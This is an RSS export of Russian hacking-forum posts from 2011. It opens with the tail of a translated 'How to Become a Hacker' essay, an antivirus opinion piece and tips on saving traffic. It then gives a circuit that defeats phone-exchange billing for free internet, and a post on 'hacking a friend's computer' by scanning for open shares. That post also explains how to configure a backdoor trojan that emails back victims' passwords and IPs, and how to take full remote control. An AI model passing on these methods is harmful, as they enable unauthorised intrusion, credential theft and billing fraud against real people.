						&lt;p&gt;Наконец, вы можете служить и распространять саму культуру (например, составляя скрупулезное руководство &amp;quot;как стать хакером&amp;quot; :-)). Но этим не стоит заниматься до тех пор, пока вы не поваритесь в этом достаточное время и не станете хорошо известны благодаря одной из четырех первых вещей.&lt;/p&gt;
						&lt;p&gt;В хакерской культуре нет явных лидеров, но здесь есть &amp;quot;культурные герои&amp;quot;, &amp;quot;племенные старейшины&amp;quot;, историки и ораторы. Когда вы достаточно долго поживете в этих траншеях, то сможете вырасти в одного из таких людей. Но остерегайтесь: хакеры настороженно относятся к своим крикливым племенным старейшинам, так что видимое достижение такого рода славы таит в себе опасность. Вместо того, чтобы стремиться к этому, вам лучше как бы не заботиться об этом и тогда это само упадет на колени, а уж затем можно быть скромным и милостивым в своем статусе.&lt;/p&gt;
						&lt;p&gt;Связь между хакером и придурком&lt;/p&gt;
						&lt;p&gt;Вопреки расхожему мифу, вам не обязательно быть придурком, чтобы быть хакером. Это, однако, помогает, и многие хакеры действительно &amp;quot;придурки&amp;quot;. Статус изгоя общества помогает вам оставаться сосредоточенными на действительно важных вещах, таких как размышления и хакерство.&lt;/p&gt;
						&lt;p&gt;Именно по этой причине многие хакеры носят ярлык &amp;quot;придурок&amp;quot; и даже используют в качестве знака доблести более грубый термин &amp;quot;кретин&amp;quot; - это их способ декларации своей независимости от общепринятых в обществе оценок. С развернутой дискуссией по этому поводу можно познакомиться на &amp;quot;странице придурков&amp;quot; - The Geek Page.&lt;/p&gt;
						&lt;p&gt;Если вы способны в достаточной степени сосредоточиться на хакерстве, достигать здесь заметных результатов и при этом иметь личную жизнь - что ж, прекрасно. Сегодня это намного легче, чем в 1970-е, когда был новичком я. Культурный мейнстрим стал теперь намного дружелюбнее к техно-придуркам. Есть даже растущее количество людей, обнаруживающих, что хакеры зачастую могут быть вполне качественными любовниками и супругами. Дополнительную информацию на этот счет можно почерпнуть на странице &amp;quot;Девушкам о ребятах-придурках&amp;quot; - Girl&#039;s Guide to Geek Guys.&lt;/p&gt;
						&lt;p&gt;Если же вас влечет к хакерству по той причине, что у вас нет личной жизни, что ж, и это неплохо. По крайней мере, у вас не будет проблем с концентрацией. А личная жизнь - как знать, может она придет позже.&lt;/p&gt;
						&lt;p&gt;Черты образа жизни&lt;/p&gt;
						&lt;p&gt;Еще раз, чтобы быть хакером, вы должны обрести мировоззрение хакера. Есть несколько вещей, которые могут помочь в те моменты, когда вы не находитесь рядом с компьютером. Они не заменяют хакерство (его ничто не заменит), но многие хакеры ими занимаются и, по их ощущениям, это на каком-то фундаментальном уровне объединяет их с сутью хакерства.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; * Читайте научную фантастику. Ходите на встречи любителей фантастики (это хороший способ познакомиться с хакерами и &amp;quot;прото-хакерами&amp;quot;).&lt;br /&gt;&amp;#160; &amp;#160; * Изучайте Дзэн-буддизм и/или восточные искусства боя. (Их ментальная дисциплина имеет, похоже, важные черты сходства).&lt;br /&gt;&amp;#160; &amp;#160; * Вырабатывайте в себе аналитический музыкальный слух. Учитесь понимать специфические виды музыки. Учитесь неплохо играть на каком-нибудь музыкальном инструменте или грамотно петь.&lt;br /&gt;&amp;#160; &amp;#160; * Вырабатывайте в себе понимание каламбуров и игр в слова.&lt;br /&gt;&amp;#160; &amp;#160; * Учитесь хорошо писать на своем родном языке. (Удивительно многие из хакеров, включая всех известных мне лучших хакеров, являются качественными писателями.) &lt;/p&gt;
						&lt;p&gt;Чем больше из этих вещей вы уже делаете, тем больше вероятность того, что вы представляете собой природный хакерский материал. Почему перечислены именно эти вещи - не вполне ясно, но они связаны со смешиванием навыков левого и правого полушарий мозга, а это представляется важным (для хакеров необходимо уметь как выстраивать стройные логические обоснования, так и время от времени оценивать проблему вне связи с очевидной логикой).&lt;/p&gt;
						&lt;p&gt;И, наконец, несколько вещей, которые делать не следует.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; * Не используйте глупые и напыщенные пользовательские имена или клички.&lt;br /&gt;&amp;#160; &amp;#160; * Не вовлекайтесь в свары и перебранки в Usenet (или где-либо еще).&lt;br /&gt;&amp;#160; &amp;#160; * Не называйте себя &amp;quot;кибер-панком&amp;quot; и не тратьте свое время на тех, кто это делает.&lt;br /&gt;&amp;#160; &amp;#160; * Не отправляйте письма или электронную почту, переполненные ошибками правописания. &lt;/p&gt;
						&lt;p&gt;Единственная репутация, которую вы себе создадите, занимаясь любой из этих вещей - это посмешище. У хакеров длинная память, и вам могут понадобиться годы жизни, чтобы об этом забыли.&lt;/p&gt;
						&lt;p&gt;Другие ресурсы&lt;/p&gt;
						&lt;p&gt;Питер Сибак ведет превосходную страницу &amp;quot;Хакер-ЧаВО&amp;quot; - Hacker FAQ для менеджеров, не представляющих себе как иметь дела с хакерами.&lt;/p&gt;
						&lt;p&gt;Мною написана также &amp;quot;Краткая история Хакерландии&amp;quot; - A Brief History Of Hackerdom.&lt;/p&gt;
						&lt;p&gt;Я написал статью &amp;quot;Храм и Базар&amp;quot; - The Cathedral and the Bazaar, в которой разъясняется, как работают проект Linux и культура открытых исходных кодов. Еще более непосредственно эта же тема рассмотрена в статье-продолжении &amp;quot;Раздел Ноосферы&amp;quot; - Homesteading the Noosphere.&lt;/p&gt;
						&lt;p&gt;Часто задаваемые вопросы&lt;/p&gt;
						&lt;p&gt;Вы научите меня хакерству?&lt;/p&gt;
						&lt;p&gt;С момента первой публикации этой страницы я получал от людей по нескольку запросов в неделю с просьбой &amp;quot;научить всему хакерскому&amp;quot;. К сожалению, я не располагаю ни временем, ни энергией этим заниматься. Мои собственные хакерские проекты занимают 110% моего времени.&lt;/p&gt;
						&lt;p&gt;И даже если бы они у меня были, хакерство - это мировоззрение и мастерство, которым вы должны научиться в основном сами. Вы обнаружите, что хотя настоящие хакеры и желают вам помочь, но они не будут вас уважать, если вы станете просить накормить вас с ложечки всем, что им известно.&lt;/p&gt;
						&lt;p&gt;Сначала научитесь нескольким вещам сами. Покажите, что стараетесь, что способны к самостоятельному обучению. И уже потом отправляйтесь к знакомым хакерам с вопросами.&lt;/p&gt;
						&lt;p&gt;Не поможете ли вы мне кракнуть систему, или может научите, как их вскрывать?&lt;/p&gt;
						&lt;p&gt;Нет. Любой, кто может опять задавать подобный вопрос по прочтении данного текста, - бестолков настолько, что его ничему нельзя научить, даже если бы у меня было на это время. Любые подобные просьбы будут проигнорированы, либо же ответ будет крайне грубым.&lt;/p&gt;
						&lt;p&gt;Где мне найти настоящих хакеров, чтобы с ними поговорить?&lt;/p&gt;
						&lt;p&gt;Самый лучший способ - найти вашу местную группу пользователей Unix или Linux и сходить на их встречи (ссылки на несколько списков групп пользователей можно найти на странице LDP на Sunsite).&lt;/p&gt;
						&lt;p&gt;(Как-то раньше я сказал, что вам не найти ни одного настоящего хакера в чатах, но мне дали понять, что ситуация меняется. Очевидно, некоторые из сообществ настоящих хакеров, связанных с такими вещами как GIMP и Perl, теперь имеют свои IRC-каналы.)&lt;/p&gt;
						&lt;p&gt;Какой язык следует выучить первым?&lt;/p&gt;
						&lt;p&gt;HTML, если вы его еще не знаете. Есть масса расфуфыренных и потрясающе бездарных книг по HTML, но обескураживающе мало хороших. Мне больше всего нравится HTML: The Definitive Guide.&lt;/p&gt;
						&lt;p&gt;Но HTML - это не полноценный язык программирования. Когда вы почувствуете, что готовы начать программировать, я бы порекомендовал начать с языка Python. Многие люди будут рекомендовать вам начинать с Perl, и этот язык более популярен чем Python, но его сложнее выучить.&lt;/p&gt;
						&lt;p&gt;Си - действительно важный язык, но он и намного сложнее, нежели Python или Perl. Не пытайтесь выучить его первым.&lt;/p&gt;
						&lt;p&gt;А не станет ли так, что из-за программ с открытым исходным кодом программистам будет не на что жить?&lt;/p&gt;
						&lt;p&gt;Ну, это вряд ли. Пока что, похоже, индустрия программного обеспечения с открытым исходным кодом скорее создает рабочие места, нежели их сокращает. Если экономически более прибыльно иметь написанную программу, чем такой программы не иметь, то программисту будут платить независимо от того, станет ли эта программа бесплатной после ее создания. И, независимо от того, как много будет написано &amp;quot;бесплатных&amp;quot; программ, всегда еще больше будет запросов на новые и специализированные приложения. Более подробно я написал об этом на страницах Open Source.&lt;/p&gt;
						&lt;p&gt;Как мне начать? Где можно достать бесплатный Unix?&lt;/p&gt;
						&lt;p&gt;Повсюду на этой странице я вставил указатели на те места, где можно взять наиболее широко используемые бесплатные версии Unix. Чтобы быть хакером, вам нужны мотивация и инициатива, а также способность к самообразованию. Начинайте прямо сейчас...&lt;/p&gt;</description>
			<author>mybb@mybb.ru (SMOKED)</author>
			<pubDate>Tue, 08 Feb 2011 21:17:19 +0300</pubDate>
			<guid>https://xakerzone.bbeasy.ru/viewtopic.php?pid=24#p24</guid>
		</item>
		<item>
			<title>интернет антивирусы</title>
			<link>https://xakerzone.bbeasy.ru/viewtopic.php?pid=23#p23</link>
			<description>&lt;p&gt;Многим пользователям всемирной паутины, да и просто людям, использующим компьютер знакомо понятие Internet антивирус. Сегодня невозможно представить computer на котором бы не стояло охранное программное обеспечение, оберегающее конфиденциальные данные, да и просто систему от заражения вирусами. Однако на сколько надежную защиту обеспечивает это ПО, может ли оно полностью гарантировать сохранность Ваших данных и работоспособность всей системы.&lt;br /&gt;Обычно Internet антивирус занимается постоянным сканированием процессов происходящих в computer и в случае если вредоносная программа начинает посягать на какие-то критические системные процессы, она блокирует ее исполнение и предупреждает пользователя о возможной опасности. В некоторых случаях Internet антивирус не просто блокирует приложение, а предлагает пользователю вылечить его, если строки злостной program внедрились в исполняемый файл в безопасное приложение.&lt;/p&gt;
						&lt;p&gt;Однако наверняка многие из тех, кто читает эту статью, замечали, что после того, как на вновь переустановленную операционную систему устанавливается Internet антивирус происходит резкое замедление работоспособности системы. На самом деле, современное охранное ПО забирает практически половину системных keys-kas.ru ресурсов computer. Если на машинах, чьи характеристики близки к космическим и оперативная память переваливает за 2 Гигабайта, а в процессор входит целых 2 и более ядра, такой значительный отбор ресурсов не очень заметен на первый взгляд, то на стареньких компьютерах в паузах между запуском приложения и началом его корректной работы можно не только налить чашку кофе, но и выпить ее.&lt;br /&gt;На столько ли нужен Internet антивирус обычным людям, которые не занимаются бизнесом в Интернете и кто использует компьютер исключительно в качестве развлекательной платформы.&lt;/p&gt;
						&lt;p&gt;На самом деле единственной проблемой тех, кто подвергается вирусной атаке, является то, что Ваш компьютер становится дополнительной отправной точкой различных пакетов данных необходимых человеку написавшему это ПО, и в большинстве своем, единственной неприятностью может стать замедленное Интернет соединение и быстрое таяние трафика, если он у Вас лимитированный.&lt;/p&gt;
						&lt;p&gt;Internet антивирус может заблокировать некоторые процессы и не дать вирусу использовать оплаченный Вами трафик, однако жертва в виде затраченных на это ресурсов оперативной памяти и работы процессора не стоит того.&lt;br /&gt;Намного эффективнее в случае с обычным пользователем сети будет использование обычного брандмауэра стороннего производителя. Одна из таких программ носит название Outpust. Установив ее на свой ПК Вы совершенно не заметите изменений в скорости его работы, кроме этого, Вы самостоятельно укажите этому программному обеспечению каким приложениям можно контактировать с Интернетом, а каким это строго запрещено. Этот софт сам у Вас спросит, можно ли тому или иному ПО обращаться к всемирной паутине, как только оно попробует это сделать.&lt;/p&gt;
						&lt;p&gt;Спустя пару часов Outpust самостоятельно начнет различать кому можно контактировать с сетью, а кому нет. Вы можете быть уверенны, что даже если Ваш компьютер будет заражен вирусом, конфиденциальные данные никуда передаваться не будут, ровно, как, и не будет таять объем мегабайтов купленного Вами трафика.&lt;/p&gt;
						&lt;p&gt;Другими словами, если вы не переживаете за то, что некоторые файлы перенесенные с Вашего компьютера на другие будут заражены вирусом, если Вы готовы раз в год переустанавливать операционную систему, можете не использовать Internet антивирус, а ограничится только брандмауэром.&lt;/p&gt;
						&lt;p&gt;Эта статья написана из собственного опыта человека, у которого уже около года не установлен ни один Internet антивирус.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (SMOKED)</author>
			<pubDate>Tue, 08 Feb 2011 21:11:11 +0300</pubDate>
			<guid>https://xakerzone.bbeasy.ru/viewtopic.php?pid=23#p23</guid>
		</item>
		<item>
			<title>экономия трафика</title>
			<link>https://xakerzone.bbeasy.ru/viewtopic.php?pid=22#p22</link>
			<description>&lt;p&gt;Вам знакомо ощущение лёгкой эйфории от смены Dial Up подключения на ADSL?&lt;br /&gt;С огромным скачком скорости, возможностью сидеть в Сетке постоянно, не поглядывая ежеминутно на таймер, сколько там времени уже прошло?&lt;br /&gt;Скорее всего, знакомо. Я сам первое время был в восторге от ADSL.&lt;br /&gt;Даже когда по итогам месяца получил от провайдера внушительный счёт на оплату, энтузиазма это не остудило. Я подумал что это нормально, просто первый месяц такой. Когда привыкну к новым возможностям, трафика буду тратить меньше.&lt;br /&gt;Но и за второй месяц счёт был не меньше. И за третий.&lt;br /&gt;Возможность сидеть в Сети постоянно имеет и обратную сторону - деньги улетают с молниеносной быстротой. Когда в очередной раз я увидел в статистике что за сутки съелось 30 с лишним мегабайт, то понял, что нужно что-то делать.&lt;br /&gt;Вариант отключится от Сети или меньше проводить в ней времени не подходил, я в ней работаю и чуть ли не живу. Только собственных сайтов дюжина, их нужно раскручивать, анализировать статистику, добавлять страницы, улучшать и т.д.&lt;br /&gt;А ещё читать новости, писать в форумы, общаться с партнёрами и клиентами, искать разнообразную информацию на многих сотнях сайтов. Так что тупо отключатся было никак нельзя.&lt;br /&gt;Нужно было искать информацию об экономии трафика.&lt;br /&gt;Информация, конечно, нашлась. В разных местах Интернет, разные советы и методики, множество платных программ и сервисов. Теперь это всё нужно было собрать воедино, настроить и проверять на себе.&lt;br /&gt;На это ушло несколько недель, и наконец, стали видны зримые результаты.&lt;br /&gt;Вы тоже можете их увидеть на этом скриншоте программы DU Meter, я пользуюсь ей для подсчёта трафика.&lt;br /&gt;экономия трафика скриншот&lt;br /&gt;DL - это Download, входящий, (скачанный) трафик. UL - Upload, исходящий трафик. Исходящий трафик на моём тарифе бесплатный.&lt;br /&gt;Итак, проблемой экономии трафика я озаботился в марте, начиная с апреля уже результаты с экономией.&lt;br /&gt;Явно видно что расход трафика снижается, причём в Сети меньше я сидеть не стал, картинки в браузере не отключал, в общем, никоим образом не менял своих обычных привычек.&lt;br /&gt;Трафик у моего провайдера стоит 1.2 руб. за мегабайт, и уменьшение объёма в среднем на 150 мегабайт в месяц дала экономию почти 200 рублей живых денег. Денег, которые раньше просто выбрасывались на ветер.&lt;br /&gt;Технически экономия складывается в основном из использования gzip сжатия, резки рекламы и локального кэширования, о каждом из этих способов ведётся речь на сайте.&lt;br /&gt;Но помогая с экономией трафика своим знакомым, большая часть из которых не относится к &amp;quot;продвинутым пользователям&amp;quot;, выяснилось что мало просто дать ссылки куда-то, где можно скачать какую-то программу, а потом как-то настроить её на работу с другой программой и т.п.&lt;br /&gt;Люди просто терялись, в лучшем случае доставали меня вопросами, в худшем просто &amp;quot;забивали&amp;quot; на эту экономию.&lt;br /&gt;Прям хоть книгу пиши, чтобы разложить всё &amp;quot;по полочкам&amp;quot;, чтоб было ясно и понятно для всех.&lt;br /&gt;И я такую книгу написал:&lt;br /&gt;Экономный web&lt;br /&gt;Экономный Web - руководство по сбору и настройке собственной, предельно простой и очень эффективной схемы, экономящей трафик.&lt;br /&gt;Это не методика получения &amp;quot;бесплатного Интернета&amp;quot;, которого в природе и не существует.&lt;br /&gt;И не советы типа: &amp;quot;хочешь меньше платить - отключись от Интернет&amp;quot;.&lt;br /&gt;Эта книга - пошаговая инструкция по настройке доступных каждому программ, причём бесплатных программ, использование которых позволит сократить расход трафика от 30% до 50%.&lt;br /&gt;Собственно, всё то, о чём речь идёт на сайте. Только максимально конкретно, с примерами и скриншотами. Единственная оговорка к использованию материала - авторские права. При перепечатке ссылка на данный сайт, как источник - обязательна!&lt;br /&gt;Экономия трафика складывается из нескольких компонентов:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; * 1. удаление со страниц рекламного мусора (баннеров, всплывающих окон, внешних объектов, загружаемых с других сайтов);&lt;br /&gt;&amp;#160; &amp;#160; * 2. gzip сжатие входящего трафика;&lt;br /&gt;&amp;#160; &amp;#160; * 3. кэширование на собственном компьютере уже скаченной информации;&lt;br /&gt;&amp;#160; &amp;#160; * 4. слежение за сетевой активностью.&lt;/p&gt;
						&lt;p&gt;схема экономии трафика&lt;/p&gt;
						&lt;p&gt;Каждый из этих способов можно использовать по отдельности, можно совместить, выстроив цепочку из программ. Схематично основа цепочки представлена на рисунке, но способ её построения и использования зависит от Ваших личных предпочтений при сёрфинге.&lt;/p&gt;
						&lt;p&gt;Например, настроенная на максимальную &amp;quot;агрессивность&amp;quot; резка баннеров удаляет с просматриваемых страниц солидную часть содержимого, что может быть неудобным для любителей &amp;quot;просто куда-нибудь сходить&amp;quot;. Большая часть рекламно-развлекательной информации будет заблокирована.&lt;/p&gt;
						&lt;p&gt;Кэширующий прокси способен дать ощутимую выгоду от своего использования если у Вас ость определённый круг постоянно посещаемых сайтов. Через некоторое время все эти сайты окажутся в кэше, и расход трафика при их посещении резко сократится. Если же Вы постоянно посещаете всё новые и новые сайты, никогда больше на них не возвращаясь, экономия за счет кэширования будет не столь значительной.&lt;/p&gt;
						&lt;p&gt;Пожалуй, только gzip сжатие применимо во всех случаях. Однако тут может возникнуть ограничение. А именно: ресурсы сервисов не бесконечные, и в периоды пиковых нагрузок скорость соединения резко падает.&lt;/p&gt;
						&lt;p&gt;Исходя из этого, я разберу по отдельности каждый возможный компонент экономии трафика, а после покажу, как создаётся и настраивается цепочка для максимальной экономии трафика. Это не догма, Вы можете выбросить из цепочки любое звено или заменить программу на другую, аналогичную, настроив, таким образом, цепочку по собственному желанию.&lt;br /&gt;Не для кого ни секрет, что при GPRS подключении на счету каждый килобайт. Цены на трафик в сотовых сетях, мягко говоря, кусаются.&lt;/p&gt;
						&lt;p&gt;Соответственно, для максимальной экономии трафика необходимо не только удалить рекламный мусор, но и всё форматирование страниц, HTML код, файлы стилей CSS. В результате загрузится только текст страницы.&lt;/p&gt;
						&lt;p&gt;Конечно, странички изменятся до неузнаваемости. Но если Вам нужна только информация, а графические и дизайнерские навороты фиолетовы, то это лучший вариант для сбережения трафика.&lt;/p&gt;
						&lt;p&gt;Реализуется жёсткая экономия при помощи специального сервиса, который доступен здесь: &lt;a href=&quot;http://www.skweezer.net/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.skweezer.net/&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Skweezer - сервис, предназначенный для просмотра сайтов на дисплеях PDA и мобильных телефонов. Он изменяет структуру страницы, чтобы она поместилась на небольшой дисплей, и вырезает со страницы всё лишнее. Пользоваться Skweezer можно по прямому предназначению, а можно и при обычном сёрфинге с мобильным устройством, подключенным в качестве модема.&lt;/p&gt;
						&lt;p&gt;Итак, у Вас есть какое-либо устройство, имеющее доступ в Интернет через GPRS и подключенное к компьютеру в качестве модема. Или же нужно посетить какой-либо сайт, а трафика потратить так мало, как это только вообще возможно.&lt;/p&gt;
						&lt;p&gt;Заходим на сайт &lt;a href=&quot;http://www.skweezer.net/,&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.skweezer.net/,&lt;/a&gt; переходим по &amp;quot;Browse the Web&amp;quot; и забиваем в форму адрес страницы, которую хотим посетить. Вот и всё.&lt;/p&gt;
						&lt;p&gt;Не очень удобно, что Skweezer - это web интерфейс, и пользоваться им можно только так. С другой стороны нет необходимости скачивать какие-либо программы и их настраивать. У самого Skweezer настроек только две: выбор языка и включение/отключение загрузки изображений (&amp;quot;Browse the Web&amp;quot; =&amp;gt; &amp;quot;Settings&amp;quot; =&amp;gt; чекбокс &amp;quot;Images On&amp;quot;).&lt;/p&gt;
						&lt;p&gt;Кроме этого, Skweezer может переводить содержание страницы. Причем не только с или на полдюжины европейских языков, но и поддерживает такую экзотику как арабский, японский и китайский языки.&lt;/p&gt;
						&lt;p&gt;Китайский я не знаю, но с англо-русским и русско-английским переводом Skweezer справляется довольно неплохо.&lt;/p&gt;
						&lt;p&gt;И последнее, что можно сделать со Skweezer - это зарегистрироваться на сервисе. Регистрация бесплатна, и основное её преимущество - возможность пользоваться закладками в аккаунте Skweezer.&lt;/p&gt;
						&lt;p&gt;Сам по себе Skweezer это радикальное средство экономии трафика. Однако если браузер настроен на работу с каким-либо сервисом gzip сжатия (лучше всего Toonel), то расход трафика уменьшается ещё больше. Тратятся буквально считанные килобайты.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (SMOKED)</author>
			<pubDate>Tue, 08 Feb 2011 21:04:12 +0300</pubDate>
			<guid>https://xakerzone.bbeasy.ru/viewtopic.php?pid=22#p22</guid>
		</item>
		<item>
			<title>как не платить за интернет</title>
			<link>https://xakerzone.bbeasy.ru/viewtopic.php?pid=21#p21</link>
			<description>&lt;p&gt;Предлагаем опробовать следующий способ.&amp;#160; &amp;#160; &amp;#160;Известно, что при соединении абонентов, напряжение в телефонной линии падает с 60 В до 5...8 В. Именно при данном напряжении включается детектор состояния линии и АТС начинает начислять за разговор денежки.&amp;#160; &amp;#160; &amp;#160;Предлагаемая схема может работать не зависимо от того, местное или междугороднее соединение происходит.&amp;#160; &amp;#160; &amp;#160;Однако, пока второй абонент не снял трубку напряжение в линии еще слишком высокое для срабатывания схемы. Таким образом, пока вы слышите сигнал вызова, деньги еще не начисляются, хотя реально соединение уже произошло.&amp;#160; &amp;#160; &amp;#160;Все, что для этого нужно сделать - предотвратить падение напряжения в линии после снятия трубки вторым абонентом, удерживая его в пределах 21....36 В. Для этого применяется простейшая схема. (рис.1) Для увеличения падения напряжения на стороне абонента, служит стабилитрон с напряжением стабилизации 12....30 В. Конденсатор, включенный параллельно стабилитрону служит для прохождения переменного тока, что повышает уровень сигнала. Можно обойтись без диодного моста, но тогда устройство надо включать в соответствии с полярностью телефонной линии. Если вы используете модем, то для более четкой его работы можно зашунтировать диоды моста конденсаторами по 0,1 мкФ. Напряжение (тип) стабилитрона подбирается экспериментально в зависимости от конкретной АТС. Начните с большего напряжения. Уменьшайте его лишь до тех пор, пока станция не перестанет отрабатывать прекращение индукторного вызова. Дело в том, что оборудование определения состояния АТС имеет технологический &amp;quot;зазор&amp;quot; между напряжением прекращения вызова и разговорным напряжением для четкого срабатывания. Напряжение получившееся в результате подбора стабилитрона, должно как раз находиться посередине этого зазора. Таким образом, вызывная схема отключается, а схема счета времени еще не включается, что позволяет выходить в Интернет бесплатно. Схема работает и на межгороде!Пользуйтесь Интернетом бесплатно!&lt;/p&gt;</description>
			<author>mybb@mybb.ru (SMOKED)</author>
			<pubDate>Tue, 08 Feb 2011 20:59:29 +0300</pubDate>
			<guid>https://xakerzone.bbeasy.ru/viewtopic.php?pid=21#p21</guid>
		</item>
		<item>
			<title>хотите взломать компьютер друга?пожалуйста</title>
			<link>https://xakerzone.bbeasy.ru/viewtopic.php?pid=20#p20</link>
			<description>&lt;p&gt;Привет всем начинающим хакерам тут выложу статью по тому как взломать компьютер.&lt;/p&gt;
						&lt;p&gt;Как взломать свой компьютер если ты забыл пароль к нему. ПОЛЕЗНОЕ ВИДЕО ОТ metacafe.&lt;br /&gt;&lt;a href=&quot;http://www.kiwi.kz/watch/2x15sh3ep2qu&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.kiwi.kz/watch/2x15sh3ep2qu&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Как взломать компьютер!&lt;br /&gt;Запускаем сканер Essential NetTools 3.0. Теперь нужно определиться какой Ip диапазон следует просканировать. Для этого просто заходим в вкладку ViewLocal IP Addresses и смотрим свой Ip, пусть будет такой 123.333.253.12. Значит пишем первый (начальный)диапазон Ip 123.333.253.1 а второй (конечный) 123.333.253.255 И видим что сканер нашел кучу удаленных компьютеров в этом диапазоне, но большинство компов не доступно для простого проникновения (no), но есть компьютеры где написано (yes), именно в такие компьютеры мы можем попасть без труда, для этого нужно просто нажать на нем правой кнопкой мышки и щелкнуть по &amp;quot;open computer&amp;quot; и через несколько минут откроется окно где Вы увидите содержимое удаленного компьютера. Вот и все!&lt;/p&gt;
						&lt;p&gt;Есть еще один способ. Для этого нам потребуется троян Смерть Ламера 2.6 (Lamer Die 2.6) или Anti-Lamer BackDoor (Скачайте в разделе &amp;quot;Троян AntiLamer&amp;quot;). Запускаем Редактор сервера и настраиваем троян по своему вкусу. И так, сервер готов, а да совсем забыл самое главное нужно настроить сервер чтобы троян присылал пароли Вам, так вот кидаете трояна кому ни будь и ждете пока к Вам не придет письмо от трояна.&lt;/p&gt;
						&lt;p&gt;Пришло письмо - пароли на инет, но вспомните главное было не пароли, а доступ к компьютеру. Так вот в письме помимо пароля указывается Ip адрес компьютера и его название в сети . Вот это нам и надо. Теперь сканируем Ip диапазон который получили, только помните если Ip 213.34.56.13 то нужно сканировать диапазон 213.34.56.1 - 213.34.56.254. Вот в принципе и все. Осталось только дождаться когда жертва выйдет в интернет и запустить Death.exe, вводим Ip жертвы, подсоединяемся и получаем полный контроль над кампом!!! Удачного Вам хака!&lt;/p&gt;
						&lt;p&gt;Рекомендации начинающему хакеру&lt;/p&gt;
						&lt;p&gt;Для того, чтобы стать удачливым компьютерным взломщиком, вам потребуется один прибор - ваши мозги. Вам не нужен даже компьютер. Более того, иногда бывает лучше вообще не иметь компьютера, как вы увидите в дальнейшем. Впрочем, для начала вам все же потребуется компьютер, модем и телефонная линия для связи с внешним миром.&lt;/p&gt;
						&lt;p&gt;Компьютер может быть каким угодно. Гораздо важнее, какой у вас модем и коммуникационное программное обеспечение. Хакерство - хобби, не требующее большого количества снаряжения; но если вам приходится что-то покупать, покупайте самое лучшее из того, что вы сможете себе позволить. Это не означает, что вы должны приобретать то, что вам предлагают продавцы или специальные журналы. Выбирайте то, что вам больше всего подойдет. Уверен, вы захотите, чтобы ваш модем был быстрым. Когда я приобрел свой первый модем, то считал 140-бодный модем просто копушей. Теперь я смотрю на 300-бодный и не понимаю, как я мог управляться с этой каракатицей.&lt;/p&gt;
						&lt;p&gt;Какой бы скоростью ни обладал ваш модем, он всегда будет работать несколько медленнее, чем вы ожидали. Из-за помех на линии модем бывает вынужден перепосылать данные снова и снова, пока не передаст или не примет их в неискаженном варианте. Модемы могут работать вполовину указанной скорости, и, если у них плохое настроение, и того медленнее. При передаче на дальние расстояния или если удаленные компьютеры слишком загружены, или при доступе к одному компьютеру через несколько других - чтобы вас труднее было выследить - скорость снижается еще больше.&lt;br /&gt;Итак, если вы хотите получать удовольствие от своих занятий - покупайте высокоскоростной модем.&lt;/p&gt;
						&lt;p&gt;Коммуникационное программное обеспечение&lt;br /&gt;Бывает трудно найти действительно подходящую коммуникационную программу, но именно от нее, в совокупности с подходящим модемом, и зависит, принесет ли вам радость ваша работа в режиме он-лайн или только разочарует вас. Существует много видов терминальных программ. Если какой-то пакет приложен к вашему модему, это еще не значит, что он вас устроит. Хорошая программа должна обладать нижеперечисленными свойствами и все они для хакера необходимы или хотя бы желательны.&lt;br /&gt;&lt;a href=&quot;http://www.rkhaker.clan.su/forum/15-3-1&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.rkhaker.clan.su/forum/15-3-1&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Взлом удаленного компьютера через интернет&lt;/p&gt;
						&lt;p&gt;Постараюсь объяснить как это сделать так сказать &amp;quot;на пальцах&amp;quot;, насколько у меня это получится - не знаю поскольку все это постигал сам...&lt;br /&gt;Взлом, Интернет&lt;br /&gt;Постараюсь объяснить как это сделать так сказать &amp;quot;на пальцах&amp;quot;, насколько у меня это получится - не знаю поскольку все это постигал сам... Прежде всего мой совет:&lt;br /&gt;Установите на свой компьютер Windows 2k&lt;br /&gt;Скачайте и установите на свой компьютер сканер Essential Net Tools v3.0&lt;br /&gt;Скачайте и установите на свой компьютер HakTek v1.1&lt;br /&gt;NEW!!! IMPORTANT!!! Не забывайте включить протокол Net BEUI и Доступ к файлам и принтерам сети Мелкософт!!&lt;br /&gt;В Windows 2000 это делается только в свойствах соединения, а в 9х его еще нужно поставить в свойствах сети!&lt;br /&gt;Ну, пожалуй для начала взлома удаленного компьютера этого вполне достаточно. Хотя нет, скачайте с сайта &lt;a href=&quot;http://www.pysoft.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.pysoft.com/&lt;/a&gt; звонилку Advanced Dialer, ну этого должно хватить...&lt;br /&gt;Теперь некоторые объяснения предыдущих действий:&lt;br /&gt;Для чего нам Windows 2k? Да очень просто - по моим наблюдениям все сканеры лучше и корректнее работают под 2000, кроме этого когда вы нашли потенциальную жертву вам нужно изменить вашу рабочую группу на группу установленную на компьютере жертвы в Windows 2000 это делается так: правая кнопка мыши на &amp;gt;Мой компьютер&amp;gt; выбираем &amp;gt;Сетевая идентификация &amp;gt;Свойства, в нижней части там где написано &amp;quot;Является членом:&amp;quot; должна стоять галочка &amp;quot;Рабочей группы&amp;quot; вы пишите нужное вам имя рабочей группы, нажимаете &amp;quot;ОК&amp;quot; и вам высвечивается приветствие &amp;quot;Добро пожаловать в рабочую группу такую-то&amp;quot;, вы нажимаете кнопочку &amp;quot;ОК&amp;quot; и вам предлагается перезагрузить компьютер для вступления в силу изменений, в этот момент вы должны не нажать кнопочку &amp;quot;ОК&amp;quot;, как ранее, а просто закрыть окошко, теперь вам просто нужно нажать &amp;quot;ОК&amp;quot; на &amp;quot;Свойствах системы&amp;quot; и опять вас предупредят о том что нужно перезагрузить компьютер, на что вы должны категорично ответить &amp;quot;НЕТ&amp;quot;. Поздравляю - изменения вступили - таки в силу без всяких там перезагрузок. В этом еще одна изюминка Windows 2000, поскольку в системах &amp;quot;для домохозяек&amp;quot;, а именно 9х, Ме изменения вступают только после перезагрузки! А это все время: время на перезагрузку, на подключение к 